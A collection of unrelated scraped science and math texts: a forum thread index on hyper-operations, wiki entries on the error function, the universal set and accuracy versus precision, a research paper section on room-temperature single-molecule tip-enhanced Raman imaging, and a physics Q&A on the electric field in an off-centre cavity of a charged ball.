Gottfried - 08/09/2012, 08:59 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 08/10/2012, 10:57 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by Xorter - 08/18/2016, 04:40 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 08/22/2016, 12:19 AM Possibly Related Threads... Thread Author Replies Views Last Post The Generalized Gaussian Method (GGM) tommy1729 2 337 10/28/2021, 12:07 PM Last Post: tommy1729 Some "Theorem" on the generalized superfunction Leo.W 44 9,164 09/24/2021, 04:37 PM Last Post: Leo.W On my old fractional calculus approach to hyper-operations JmsNxn 14 3,121 07/07/2021, 07:35 AM Last Post: JmsNxn Generalized Kneser superfunction trick (the iterated limit definition) MphLee 25 8,070 05/26/2021, 11:55 PM Last Post: MphLee A Holomorphic Function Asymptotic to Tetration JmsNxn 2 1,101 03/24/2021, 09:58 PM Last Post: JmsNxn hyper 0 dantheman163 2 5,283 03/09/2021, 10:28 PM Last Post: MphLee On to C^\infty--and attempts at C^\infty hyper-operations JmsNxn 11 3,730 03/02/2021, 09:55 PM Last Post: JmsNxn Generalized phi(s,a,b,c) tommy1729 6 2,019 02/08/2021, 12:30 AM Last Post: JmsNxn Thoughts on hyper-operations of rational but non-integer orders? VSO 2 3,701 09/09/2019, 10:38 PM Last Post: tommy1729 Can we get the holomorphic super-root and super-logarithm function? Ember Edison 10 14,899 06/10/2019, 04:29 AM Last Post: Ember Edison Users browsing this thread: 2 Guest(s)
# Error function Main Article Discussion Related Articles  [?] Bibliography  [?] Citable Version  [?] This editable Main Article is under development and subject to a disclaimer. In mathematics, the error function is a function associated with the cumulative distribution function of the normal distribution. The definition is ${\displaystyle \operatorname {erf} (x)={\frac {2}{\sqrt {\pi }}}\int _{0}^{x}\exp(-t^{2})dt.\,}$ The complementary error function is defined as ${\displaystyle \operatorname {erfc} (x)=1-\operatorname {erf} (x).\,}$ The probability that a normally distributed random variable X with mean μ and variance σ2 exceeds x is ${\displaystyle F(x;\mu ,\sigma )={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x-\mu }{\sigma {\sqrt {2}}}}\right)\right].}$
### Set of all sets This article is about the largest set in some set theories. For a proper class, see universe (mathematics). For the meaning in probability theory, see sample space. For the meaning in graph drawing, see universal point set. In set theory, a universal set is a set which contains all objects, including itself.[1] In set theory as usually formulated, the conception of a set of all sets leads to a paradox. The reason for this lies with Zermelo's axiom of comprehension: for any formula $\varphi\left(x\right)$ and set Template:Mvar, there exists a set $\\left\{x \in A \mid \varphi\left(x\right)\\right\}$ which contains exactly those elements Template:Mvar of Template:Mvar that satisfy $\varphi$. If the universal set Template:Mvar existed and the axiom of comprehension applied to it, then Russell's paradox would arise from $\\left\{x \in V\mid x\not\in x\\right\}$. Generally, for any set Template:Mvar we can prove that $\\left\{x \in A\mid x\not\in x\\right\}$ is not an element of Template:Mvar. A second difficulty is that the power set of the set of all sets would be a subset of the set of all sets, provided that both exist. This conflicts with Cantor's theorem that the power set of any set (whether infinite or not) always has strictly higher cardinality than the set itself. The idea of a universal set seems intuitively desirable in the Zermelo–Fraenkel set theory, particularly because most versions of this theory do allow the use of quantifiers over all sets (see universal quantifier). This is handled by allowing carefully circumscribed mention of Template:Mvar and similar large collections as proper classes. In theories in which the universe is a proper class, $V \in V$ is not true because proper classes cannot be elements. ## Set theories with a universal set There are set theories known to be consistent (if the usual set theory is consistent) in which the universal set Template:Mvar does exist (and $V \in V$ is true). In these theories, Zermelo's axiom of comprehension does not hold in general, and the axiom of comprehension of naive set theory is restricted in a different way. The most widely studied set theory with a universal set is Willard Van Orman Quine’s New Foundations. Alonzo Church and Arnold Oberschelp also published work on such set theories. Church speculated that his theory might be extended in a manner consistent with Quine’s,[2] but this is not possible for Oberschelp’s, since in it the singleton function is provably a set,[3] which leads immediately to paradox in New Foundations.[4] Zermelo–Fraenkel set theory and related set theories, which are based on the idea of the cumulative hierarchy, do not allow for the existence of a universal set.
## Introduction Observations of single molecules in different chemical environments1,2,3,4,5,6,7,8,9,10,11 are enabled via surface-enhanced Raman scattering (SERS) or tip-enhanced Raman spectroscopy (TERS), based on their characteristic spectral “fingerprint”12,13,14,15. In general, SERS provides a larger enhancement factor in single-molecule detection compared to TERS16 which gives access to extremely weak vibrational responses of single molecules17. On the other hand, TERS allows us to probe even individual chemical bonds in a single molecule18,19,20,21 using a strongly localized optical field at the plasmonic nano-tip22,23,24, controlled by scanning probe microscopy approaches16,25. Specifically, these experiments revealed the conformational heterogeneity, intramolecular coupling, vibrational dephasing, and molecular motion of single molecules at cryogenic temperatures under ultrahigh vacuum environments5,18,26,27,28. The extreme experimental conditions are advantageous to reduce rotational and spectral diffusions of single molecules and prevent contamination of tips from a surrounding medium. On the other hand, the cryogenic TERS setup cannot be widely deployed because its configuration is highly complicated and the level of difficulty for experiments is also very high. Moreover, performing single-molecule TERS experiments at room temperature is necessarily required to investigate the molecular functions and interactions with respect to chemical environments, such as temperature and atmospheric condition5,29,30. In particular, understanding the conformational heterogeneity of single molecules in the non-equilibrium state is highly desirable because it can address many fundamental questions regarding the structure and function of many biological systems31,32,33,34,35, such as protein folding36,37 and RNA dynamics38,39,40. Previously, a few TERS groups detected single molecules at room temperature30,41,42, yet only limited molecular properties were characterized due to the rapid structural dynamics of molecules exposed to air. Therefore, a systematic approach for robust single-molecule TERS experiments at room temperature is highly desirable. Here, we present a room-temperature freeze-frame approach for single-molecule TERS. To capture the single molecules, we deposit an atomically thin dielectric capping layer (0.5 nm thick Al2O3) onto the molecules on the metal substrate. The freeze-frame keeps the molecules stable at a single-position with much less molecular motions, and thus enables robust single-molecule level TERS experiments at room temperature. Through this approach, we obtain TERS maps of single-level brilliant cresyl blue (BCB) molecules at room temperature, allowing us to probe the spatial heterogeneity of the single BCB molecules adsorbed on the Au surface. Furthermore, through the quantitative analysis of the measured TERS frequency variation through density functional theory (DFT) calculations, we provide a comprehensive picture of the conformational heterogeneity of single molecules at room temperature. ## Results and discussion ### Pre-characterization for ideal TERS conditions For highly sensitive single-molecule level detection at room temperature, we use bottom-illumination mode TERS, as illustrated in Fig. 1a. As a sample system, BCB molecules were spin-coated on a thin metal film and covered by an Al2O3 capping layer to suppress rotational and spectral diffusion5. The capping layer not only provides a freeze-frame for individual molecules, but also protects them from unwanted chemical contamination under ambient conditions, especially by sulfur43 and carbon44 molecules. Moreover, it prevents possible contamination of the Au tip, e.g., adsorption of the probing molecules onto the tip surface that can cause artifact signals, as shown in Fig. 1a (see Supplementary Fig. 1 for more details). It should be also noted that a previous study demonstrated that photobleaching of BCB molecules is significantly reduced under vacuum environment compared to the ambient condition because oxygen in air causes the photodecomposition process30. Hence, the Al2O3 capping layer is beneficial to reduce the photobleaching effect of molecules in our experiment. We used an electrochemically etched Au tip attached to a tuning fork for normal-mode atomic force microscopy (AFM) operation (see Methods for details). Using an oil-immersion lens (NA = 1.30), we obtained a focused excitation beam with a sub-wavelength scale, which can highly reduce the background noise of far-field signals in TERS measurements. Furthermore, in combination with the radially polarized excitation beam, we achieved strong field localization in the normal direction with respect to the sample surface, i.e., a strong out-of-plane excitation field in parallel with the tip axis45. The excitation field, with a wavelength of 632.8 nm, is localized at the nanoscale tip apex, and the induced plasmon response gives rise to the resonance Raman scattering effect with the BCB molecules41. Figure 1b shows the far-field and TERS spectra of BCB molecules measured with linearly and radially polarized excitation beams (see Supplementary Fig. 2 for the plasmon response). With the exposure time of 0.5 s, we hardly observed the far-field Raman response of molecules (black), due to the extremely low Raman scattering cross-section. By contrast, we observed a few distinct Raman modes via the TERS measurements with a linearly polarized excitation (blue). Moreover, through the radially polarized excitation46,47, we observed most of the normal modes with a substantially larger TERS intensity (red) compared to the TERS spectra measured with the linearly polarized excitation. The radially-polarized beam has much larger vertical field component after passing through a high NA objective lens compared to the linearly-polarized beam48. For example, the C-H2 scissoring mode at ~1360 cm−1 is clearly identified in the TERS spectrum measured with the radially polarized light, whereas it is not present in the TERS spectrum measured with the linearly polarized light. ### Optimization of the metal substrate for TERS In bottom-illumination mode TERS, the deposition of flat thin metal films on the coverslip is required to preserve the transparency of the substrate and to avoid SERS and fluorescence signals originating from the metal nano-structures49. To demonstrate the influence of the surface condition of metal films, we performed a control experiment based on Au films fabricated by four different conditions with two control parameters of the cleaning method and the deposition rate (see Supplementary Table 1 for detailed control parameters). From the AFM results of Fig. 1c–e, we verify that the optimal process is required for fabrication of flat metal thin films (see Supplementary Fig. 3 for detailed experiment results). Another important parameter for bottom-illumination mode TERS is the metal film thickness, because a sufficiently thick metal film is required to induce strong dipole-dipole interactions between the tip dipole and the mirror dipole of the metal film50. However, the light transmission decreases with increasing metal thickness, which gives rise to a reduced excitation rate and collection efficiency in TERS. To experimentally determine the optimal thickness, we deposited Au films on O2-plasma-cleaned coverslips with a Cr adhesion layer. We prepared six metal films with various thicknesses of 5, 7, 9, 11, 13, and 15 nm. Among these metal substrates, we could not perform TERS experiments with the 15 nm metal film because it was difficult to align the tip apex to the laser focus due to low light transmission. Regarding the 5 and 7 nm metal films, we could barely observe TERS signals from the BCB film because the TERS enhancement factor was too low. Therefore, we performed a control experiment with three different metal substrates, namely with metal thicknesses of t = 9, 11, and 13 nm. To compare the relative TERS intensities of BCB film for these three metal substrates, we obtained the TERS spectra for these substrates with three different Au tips, i.e., each sample was measured using three Au tips. Figure 2a shows a comparison of the measured TERS intensities with respect to the thickness of the metal films. We consider the strongest TERS peak at ~580 cm−1 and determine the relative TERS intensities for different metal films. When we used three different tips for this control experiment, the TERS enhancement factors in each case were different; nevertheless, the metal film with 11 nm thickness yielded the strongest TERS signal for all the tips. Therefore, we normalize the TERS intensity measured for the 11 nm metal film to [0, 1] for all three tips and compare the relative TERS intensities measured for the 9 and 13 nm metal films for each tip, as displayed in Fig. 2a. The black circles indicate the average TERS intensities for the three tips, for each substrate. The TERS intensities of the ~580 cm−1 peak, measured for the 9 nm and 13 nm thick metal films, are ~30% and ~60% lower than that measured for the 11 nm metal film. We then verified the ideal metal film thickness through theoretical approaches. First, we calculated the localized optical field intensity between the Au tip apex and the Au surface with respect to the metal film thickness using finite-difference time-domain (FDTD) simulations under the excitation light source (λ = 632.8 nm) placed below the Au film (see Methods and Supplementary Fig. 4 for details). Figure 2b and c show the simulated $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{z}}}}}}}}\right|}^{2}$$ distributions for the metal film thicknesses of 9 nm and 11 nm, respectively (see Supplementary Fig. 5 for $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{x}}}}}}}}\right|}^{2}$$ and $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{total}}}}}}}}\right|}^{2}$$ components). When we set the distance d between the Au tip and Au surface to d = 3 nm (i.e., the expected gap in tuning fork-based AFM), we achieve the maximum excitation rate for TERS, $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{z}}}}}}}}\right|}^{2}$$ ≈ 400, with the metal thickness of 11 nm. We subsequently calculate the expected optical signal, $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{z}}}}}}}}\right|}^{2}$$ × T, where T is the calculated transmittance at λ ~ 657 nm by considering the strongest Raman peak of BCB at ~580 cm−1 (see Supplementary Fig. 6 for details). Figure 2d shows the calculated signal as a function of the metal film thickness in the bottom-illumination geometry. T is calculated with the following formula51: $${{{{{{{\boldsymbol{T}}}}}}}}={\left|\frac{{{{{{{{\bf{E}}}}}}}}(t)}{{{{{{{{{\bf{E}}}}}}}}}_{{{{0}}}}}\right|}^{2}={e}^{-4\pi \kappa t/\lambda },$$ (1) where E0 and E(t) are incident and transmitted optical field amplitudes, κ is the extinction coefficient of Au at the given wavelength λ, and t is the thickness of the metal film (see also Supplementary Fig. 7 for the experimentally measured transmittance)52. $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{z}}}}}}}}\right|}^{2}$$ at each film thickness is obtained from FDTD simulations and multiplied by T, as the light passes through the metal film. $${\left|{{{{{{{{\bf{E}}}}}}}}}_{{{{{{{\rm{z}}}}}}}}\right|}^{2}$$ × T is gradually enhanced with an increase in thickness up to t = 11 nm, but interestingly, it starts to decrease from 12 nm. To understand this behavior, we performed the same thickness-dependence simulations for different gaps between the tip and the metal surface (see Supplementary Fig. 8 for simulated results). Through these simulations, we found that the optimal metal film thickness varies slightly depending on the gap; nevertheless, the optimal metal film thickness is ~11–12 nm irrespective of the tip-surface gap (see also Supplementary Fig. 9 for the effect of Al2O3 at the tip-sample junction). Note that a previous study demonstrated that the plasmon resonance from a ~ 12 nm thick Au film gives rise to the largest TERS enhancement for the optical responses at ~ 640 nm53. Through the optimization process, the estimated TERS enhancement factor in our experiment is ~ 2.0 × 105 (see Supplementary Note 1 for details), which is sufficient for single-molecule level Raman scattering detection as discussed in the previous study54. ### Single-molecule level TERS imaging at room temperature We then performed the hyperspectral TERS imaging of single isolated BCB molecules adsorbed on the optimal metal film (t = 11 nm). First of all, we prepared a low-molecular density sample as described in Methods. Then, the freeze-frame (0.5 nm thick Al2O3) allowed us to stably detect single-molecule responses at room temperature (see Methods for details). Figure 3a and b shows the TERS integrated intensity images of the vibrational modes at ~580 cm−1 (in-plane stretching mode of C and O atoms in the middle of the molecule) and ~1160 cm−1 (in-plane asymmetric stretching mode of O atom), which are only two recognizable TERS peaks of a single or a few BCB molecules, due to the short acquisition time (0.5 s) in our TERS mapping30,41 (see also Supplementary Fig. 10 for the raw images of Fig. 3a and b). In the TERS images of both the ~580 cm−1 and the ~1160 cm−1 modes, the TERS intensity of the detected regions shows a spatial variation even though the responses are detected in similar nanoscale areas. This spatially heterogeneous intensity distribution originates from the difference in the number of probing molecules and/or the molecular orientation on the Au surface. Since the apex size of the electrochemically etched Au tip is larger than ~15 nm, several molecules under the tip can be detected together, which gives rise to a strong TERS response. Alternatively, although some of the observed TERS responses are from single molecules, the Raman scattering cross-section can differ from molecule to molecule due to their orientations and the corresponding TERS selection rule5. Specifically, because the excitation field in our TERS setup has a strong out-of-plane polarization component, the peak-to-peak Raman scattering intensity changes depending on the conformation of a molecule. Hence, the conformational heterogeneity of probed molecules can be best exemplified by the peak intensity ratio of the vibrational modes at ~580 cm−1 (Fig. 3a) and at ~1160 cm−1 (Fig. 3b), as shown in Fig. 3c. Since TERS tip selectively probes the out-of-plane modes with respect to the surface, the peak intensity ratio can be low for multiple molecules in comparison with the single molecules. It should be noted that no structural evidence of single molecules was found in the simultaneously measured AFM topography image (Supplementary Fig. 11). Figure 3d shows time-series TERS spectra at a single spot exhibiting robust signals without spectral fluctuations owing to the freeze-frame effect. From this result, we expect stationary conformation of the molecules in the measurement area of Fig. 3a–c. By contrast, fluctuating TERS spectra with respect to time are observed without the capping layer (see Supplementary Fig. 12 for comparison). From the TERS response corresponding to the nanoscale regions in the TERS image, we can infer the possibility of single-molecule detection; nevertheless, more substantial evidence is needed to verify this possibility. In addition to the aforementioned molecular orientation and the selection rule, the vibrational energy of the normal modes of an adsorbed molecule can change due to coupling with the atoms of the metal surface, leading to peak shift and intensity change signatures4,55,56. Additionally, the peak linewidth should be considered to distinguish the molecular ensembles from the single or a few molecules29. Further, to distinguish the single, a few, or multiple molecules, we also need to consider the spatial distribution in TERS images in addition to spectroscopic information57. Hence, we analyze the spectral properties and spatial distribution of the observed spots in the TERS image to obtain the evidence of single-molecule detection. We classify the observed TERS spots in Fig. 3 into two groups, as shown in Fig. 4a. We surmise that the TERS response in the first group (red circled spots 1–3) was measured from multiple BCB molecules because the TERS signal of both the ~580 cm−1 and the ~1160 cm−1 modes is pronounced, significant TERS peak shift is not observed, and the peaks have generally broad linewidths, as shown in Fig. 4b and c (see also Fig. 3a and b). By contrast, we observe much weaker TERS responses in the second group (blue circled spots 4–9 in Fig. 4a) with a significant peak variation corresponding to ~580 cm−1, as large as ~7.5 cm−1, as shown in Fig. 4d (see Supplementary Fig. 13 for the full spectral range). We then consider the linewidth of each spectrum and spatial distribution in the TERS image to distinguish the single and a few molecules. First of all, we classify the spot 4 as a few molecules. Although its TERS intensity is weak with the small spatial distribution, the linewidth is quite broad (7.5 cm−1) comparable to the first group (see Supplementary Table 2 for details). It should be noted that a few molecules can show broad linewidth even with double peaks when the molecules have different conformations (see Supplementary Fig. 14 for details). The remaining five spots (S5-9) show narrow linewidths of ≤6.0 cm−1, which is closer to the spectral resolution in our experiment (see also Supplementary Fig. 12). Hence, we finally classify these spots into single or a few molecules group based on the spatial distribution in TERS image. As can be seen in Fig. 4a, the TERS response of spots S5, S7, and S8 is spatially spread out, which means the signals were obtained from a few molecules. Therefore, from the spatio-spectral analyses, we believe the TERS responses from S6 and S9 are possibly originated from single isolated BCB molecules. ### DFT calculation of vibrational modes in different chemical environments To reveal the possible origins of the observed TERS peak variations, we calculated the normal vibrational modes of a BCB molecule through DFT simulations. Since the BCB molecules are encapsulated using a thin dielectric layer, we presume the spectral diffusion is suppressed, as experimentally demonstrated in Fig. 3d. Based on this assumption, we design two kinds of fixed conformations of a BCB molecule, i.e., horizontal and vertical geometries with respect to the Au (111) surface. Regarding horizontally laying molecules, we additionally consider the position of the BCB molecules (especially C atoms vibrating with a large amplitude for the ~580 cm−1 mode) with respect to the Au atoms since the substrate-molecule coupling effect can be slightly changed (see Methods for calculation details). Figure 5a shows the calculated normal modes (colored vertical lines) of a BCB molecule with the measured TERS spectra at spots 4–9 (Fig. 4a and d) for different chemical environments described in Fig. 5b–d. In the frequency range of 570–590 cm−1, two theoretical vibrational modes (ν1 and ν2) are observed even though only a single peak was experimentally observed due to the limited spectral resolution and inhomogeneous broadening at room temperature. As individual atoms in a BCB molecule involve additional coupling to Au atoms on the surface, the Raman frequencies of two vibrational modes are varied depending on the conformation and the position of the molecule. When the two strongly oscillating C atoms of the molecule (as indicated with black dashed rectangles in Fig. 5b) are closer to the nearest Au atoms (the average atomic distance of two carbon atoms with the Au atom is 3.7 Å), ν1 is calculated as 575.29 cm−1 with the out-of-plane bending vibration mode of the C atoms and ν2 is calculated as 576.94 cm−1 with the in-plane stretching mode of the C atoms. By contrast, when these C atoms (as indicated with black dashed rectangles in Fig. 5c) are vertically mis-located with longer atomic distance with respect to the Au atoms (the average atomic distance of two carbon atoms with the Au atom is 4.2 Å), the Raman frequency of the out-of-plane bending mode of the C atoms is increased to 579.23 cm−1 (ν1 in Fig. 5c). It is likely that the two strongly oscillating C atoms having shorter atomic distance with the Au atoms (Fig. 5b) experience stronger damping forces than the C atoms located further away from the closest Au atoms (Fig. 5c). On the other hand, both ν1 and ν2 are significantly increased for a vertically standing molecule (Fig. 5d) due to the lessened molecular coupling with the Au atoms (see Supplementary Fig. 15 for the normal mode of a BCB molecule in the gas phase). From these simulation results, we can deduce that the experimentally observed possible single molecules in S6, and S9 (in Figs. 3 and 4) likely have similar molecular orientations to the illustrations in Fig. 5c. The other chemical or environmental conditions give much less effect to the spectral shift compared to the molecular orientation and coupling (mainly C-Au atoms). The observed molecule in S8 is expected to have same molecular orientation as the molecules in S4, and S5 with the C atoms vertically aligned with respect to the Au atoms, as shown in Fig. 5b. The observed broader linewidth and higher frequency TERS peak at S7 indicate the molecule in S7 is oriented vertically, as displayed in Fig. 5d. Hence, in this work, we experimentally verified the freeze-frame effect using a thin dielectric layer and probed the conformational heterogeneity of possible single molecules at room temperature through highly sensitive TERS imaging and spectral analyses with DFT simulations. We exclude other possible effects of the observed spatial shifts for the following reasons. First, spectral shifts can occur depending upon the chemically distinct states, i.e., protonation and deprotonation, of molecules due to the local pH differences58. However, in our work, the spin-coated BCB molecules are physisorbed on the Au surface (not chemically bound) and the proton transfer process rarely occurs because of the encapsulating dielectric layer on the molecules59. Second, spectral shifts can be observed by the hot-carrier injection from the plasmonic metal to molecules because it can cause a change in molecular bond lengths60. However, in our experiment, we exclude this hot-carrier injection effect because the tip-molecule distance is maintained at ~3 nm and the dielectric capping layer also suppresses the hot-carrier injection. Third, a previous study demonstrated that oxidation-reduction reaction of molecules could be induced by electrochemical TERS61. However, since we do not apply external bias to the BCB molecules, we believe the redox effect is negligible in our observed spectral shifts. Lastly, the Stark effect was experimentally observed for single molecules sandwiched with the metal nano-gap when the applied DC electric fields at the gap was large enough (~10 V/nm)62. Since we do not apply external bias to the BCB molecules, we can ignore the Stark effect. In summary, we demonstrated the hyperspectral TERS imaging of possibly single molecules at room temperature by optimizing experimental conditions. In addition, the thin dielectric Al2O3 layer encapsulating the single molecules adsorbed onto the Au (111) surface played a significant role, as a freeze-frame, in enabling room temperature single-molecule TERS imaging. This is because the thin dielectric layer can suppress the rotational and spectral diffusions of molecules and inhibit the chemical reactions and contaminations in air, including potential physisorption of molecules onto the Au tip63,64. Through this room-temperature TERS imaging approach at the single-molecule level, we examined the conformational heterogeneity of BCB molecules with supporting theoretical DFT calculations. We envision that the presented optimal experimental setup for single-molecule TERS measurements will be broadly exploited to investigate unrevealed single-molecule characteristics at room temperature. For example, we can investigate intramolecular vibrational relaxation more accurately at the single-molecule level using this freeze-frame and variable-temperature TERS5. In addition, the single-molecule strong coupling study at room temperature will be more easily accessible and various advanced studies will be enabled6, such as tip-enhanced plasmon-phonon strong coupling and investigation of the coupling strength with respect to the molecular orientation. Furthermore, this approach can extend to the single-molecule transistor studies at room temperature with very robust conditions, e.g., suppressing spectral fluctuations, photobleaching, and contaminations. ## Methods ### Sample preparation Coverslips (thickness: 170 μm) for non-optimal rough metal films (Fig. 1c) were cleaned with piranha solution (3:1 mixture of H2SO4 and H2O2) for >60 min and ultrasonicated in deionized water. The other coverslips for optimal smooth metal films (Fig. 1d) were ultrasonicated in acetone and isopropanol for 10 mins each, followed by O2 plasma treatment for 10 mins. The coverslips were then deposited with a Cr adhesion layer with a thickness of 2 nm (a rate of 0.01 nm/s) and subsequently deposited with Au films with varying thicknesses (0.01 nm/s to 0.1 nm/s) at the base pressure of ~10−6 torr using a conventional thermal evaporator. The deposition rate of metals was precisely controlled using a quartz crystal microbalance detector. The transmittance spectra of the substrates were measured by a UV–Vis spectrometer (UV-1800, Shimadzu). Next, BCB molecules in ethanol solution (100 nM for the single-molecule experiment and 1.0 mM for the thickness optimization process) were spin-coated on the metal thin films at 150 × g (3000 rpm). Finally, an Al2O3 capping layer with a thickness of 0.5 nm was deposited on the sample surface using an atomic layer deposition system (Lucida D100, NCD Co.). The Al2O3 layer was deposited with the growth rate of 0.11 nm per cycle at the temperature of 150 °C under the base pressure of 40 mTorr. Precursor for the Al2O3 ALD was trimethylaluminum (TMA) vapor, and H2O vapor as the oxidant with N2 carrier gas. ### TERS imaging setup For TERS experiments, we used a commercial optical spectroscopy system combined with an AFM (NTEGRA Spectra II, NT-MDT). The excitation beam from a single-mode-fiber-coupled He-Ne laser (λ = 632.8 nm, optical power P of ≥100 μW) passed through a half-wave plate (λ/2) and was collimated using two motorized lenses. The beam passed through a radial polarizer and was focused onto the sample surface with an oil immersion lens (NA = 1.3, RMS100X-PFOD, Olympus) in the inverted optical microscope geometry. The electrochemically etched Au tip (apex radius of ~10 nm) attached on a tuning fork was controlled using a PZT scanner to alter the position of the Au tip with respect to the focused laser beam. The backscattered signals were collected through the same optics and transmitted to a spectrometer and charge-coupled device (Newton, Andor) after passing through an edge filter (633 nm cut off). The spectrometer was calibrated using a mercury lamp and the Si Raman peak at 520 cm−1, and its spectral resolution was ~4.3 cm−1 for a 600 g/mm grating. ### FDTD simulation of optical field distribution We used FDTD simulations (Lumerical Solutions, Inc.) to quantify the optical field enhancement at the apex of the Au tip with respect to the metal film thickness. The distance between the Au tip and the Au film was set to 2–4 nm based on our experimental condition. As a fundamental excitation source, monochromatic 632.8 nm light was used with linear polarization parallel to the tip axis. The theoretical transmittance of thin gold films was calculated using the material properties obtained from ref. 52. ### DFT calculation of BCB vibrational modes DFT calculations were performed using the Vienna Ab initio Simulation Package to identify the normal vibrational modes of a single BCB molecule. In our simulation model, the chemical environment and molecular orientation were critically considered; i.e., the vibrational modes for a BCB molecule placed in a free space and adsorbed onto the Au (111) surface in different orientations and positions were calculated. Specifically, molecules oriented normal and parallel to the Au surface were modeled. For a molecule placed parallel to the Au surface, the lateral position was varied, as shown in Fig. 5, to consider the effect of an interaction between the atoms of the BCB molecule and those of the Au surface. To describe the adsorption of a molecule on the Au (111) surface, Tkatchenko and Scheffler dispersion correction65 with the Perdew–Burke–Ernzerhof exchange functional66 was employed. Regarding the Au (111) slab supercell, four layers of Au atoms were considered, with the top two layers optimized in the gamma point. Furthermore, 1.5 nm vacuum space was considered to avoid an interaction between periodic slabs, and the plane-wave energy cutoff was set to 550 eV. The vibrational modes of the BCB molecule were shown using visualization for electronic and structural analysis.
# Electric Field inside a hollow ball, excentred of a homogeneous charged ball Q: We have a homogeneous charged ball with radius R which contains a ball-shaped hollow (with radius := r and distance from center of the bigger ball (M) to the center of the hollow (N) := b). What’s now the field force inside the hollow, depending on b? ———— I first thought about calculating E(Ball R, without a hollow) - E(of the hollow r, displaced ) to use the superpostion principle, but then i would have no idea how to calculate the latter of those… would be happy about any hints! - "... the field force.." Are you looking for the electric field, or a force the electric field exerts on some other object? Not to reprimand you but this is a common error students make - make sure you distinguish electric field and electric force. These are related but distinct concepts. – DJBunk Feb 22 '13 at 21:33 thank you for the correction! to precise: here i’m looking for the electric field… :) – user20486 Feb 22 '13 at 21:51 Couldn't you use the superposition principle, treating the hollow as a homogoneous charged ball with radius r with opposite charge density from the ball with radius R? – KDN Feb 23 '13 at 0:55 @user20486 - you might want to edit the question to reflect this, at the very least for people looking at the question in the future. Thanks. – DJBunk Feb 23 '13 at 20:51 The answer is indeed the superposition principle. You have to calculate both the field of the ball with radius R and the field of a ball with radius r, placed away from the center at a distance b. Then you substract the field of the smaller ball from the larger one and you are done. This is equivalent to a superposition of the fields of two balls with charge of opposite sign. - Thank you! This seems also for me the most reasonable way - this leads to the calculation and subtracting of those 2 electric fields (one standard electric field calculation for any point inside a homogeneous charged ball, and the same again just with smaller radius and displaced center with same charge density, where one just have to do a substitution) – user20486 Feb 24 '13 at 17:56
Mon compte connexion inscription Publicité ▼ ## définition - accuracy vs precision voir la définition de Wikipedia Wikipedia # Accuracy and precision (Redirected from Accuracy vs. precision) In the fields of engineering, industry and statistics, the accuracy of a measurement system is the degree of closeness of measurements of a quantity to its actual (true) value. The precision of a measurement system, also called reproducibility or repeatability, is the degree to which repeated measurements under unchanged conditions show the same results.[1] Although the two words can be synonymous in colloquial use, they are deliberately contrasted in the context of scientific method. Accuracy indicates proximity of measurement results to the true value, precision to the repeatability or reproducibility of the measurement A measurement system can be accurate but not precise, precise but not accurate, neither, or both. For example, if an experiment contains a systematic error, then increasing the sample size generally increases precision but does not improve accuracy. Eliminating the systematic error improves accuracy but does not change precision. A measurement system is called valid if it is both accurate and precise. Related terms are bias (non-random or directed effects caused by a factor or factors unrelated by the independent variable) and error (random variability), respectively. The terminology is also applied to indirect measurements, that is, values obtained by a computational procedure from observed data. ## Accuracy versus precision; the target analogy High accuracy, but low precision High precision, but low accuracy Accuracy is the degree of veracity while precision is the degree of reproducibility.[citation needed] The analogy used here to explain the difference between accuracy and precision is the target comparison. In this analogy, repeated measurements are compared to arrows that are shot at a target. Accuracy describes the closeness of arrows to the bullseye at the target center. Arrows that strike closer to the bullseye are considered more accurate. The closer a system's measurements to the accepted value, the more accurate the system is considered to be. To continue the analogy, if a large number of arrows are shot, precision would be the size of the arrow cluster. (When only one arrow is shot, precision is the size of the cluster one would expect if this were repeated many times under the same conditions.) When all arrows are grouped tightly together, the cluster is considered precise since they all struck close to the same spot, even if not necessarily near the bullseye. The measurements are precise, though not necessarily accurate. However, it is not possible to reliably achieve accuracy in individual measurements without precision—if the arrows are not grouped close to one another, they cannot all be close to the bullseye. (Their average position might be an accurate estimation of the bullseye, but the individual arrows are inaccurate.) See also circular error probable for application of precision to the science of ballistics. ## Quantifying accuracy and precision Ideally a measurement device is both accurate and precise, with measurements all close to and tightly clustered around the known value. The accuracy and precision of a measurement process is usually established by repeatedly measuring some traceable reference standard. Such standards are defined in the International System of Units and maintained by national standards organizations such as the National Institute of Standards and Technology. This also applies when measurements are repeated and averaged. In that case, the term standard error is properly applied: the precision of the average is equal to the known standard deviation of the process divided by the square root of the number of measurements averaged. Further, the central limit theorem shows that the probability distribution of the averaged measurements will be closer to a normal distribution than that of individual measurements. With regard to accuracy we can distinguish: • the difference between the mean of the measurements and the reference value, the bias. Establishing and correcting for bias is necessary for calibration. • the combined effect of that and precision. A common convention in science and engineering is to express accuracy and/or precision implicitly by means of significant figures. Here, when not explicitly stated, the margin of error is understood to be one-half the value of the last significant place. For instance, a recording of 843.6 m, or 843.0 m, or 800.0 m would imply a margin of 0.05 m (the last significant place is the tenths place), while a recording of 8,436 m would imply a margin of error of 0.5 m (the last significant digits are the units). A reading of 8,000 m, with trailing zeroes and no decimal point, is ambiguous; the trailing zeroes may or may not be intended as significant figures. To avoid this ambiguity, the number could be represented in scientific notation: 8.0 × 103 m indicates that the first zero is significant (hence a margin of 50 m) while 8.000 × 103 m indicates that all three zeroes are significant, giving a margin of 0.5 m. Similarly, it is possible to use a multiple of the basic measurement unit: 8.0 km is equivalent to 8.0 × 103 m. In fact, it indicates a margin of 0.05 km (50 m). However, reliance on this convention can lead to false precision errors when accepting data from sources that do not obey it. Looking at this in another way, a value of 8 would mean that the measurement has been made with a precision of 1 (the measuring instrument was able to measure only down to 1s place) whereas a value of 8.0 (though mathematically equal to 8) would mean that the value at the first decimal place was measured and was found to be zero. (The measuring instrument was able to measure the first decimal place.) The second value is more precise. Neither of the measured values may be accurate (the actual value could be 9.5 but measured inaccurately as 8 in both instances). Thus, accuracy can be said to be the 'correctness' of a measurement, while precision could be identified as the ability to resolve smaller differences. Precision is sometimes stratified into: • Repeatability — the 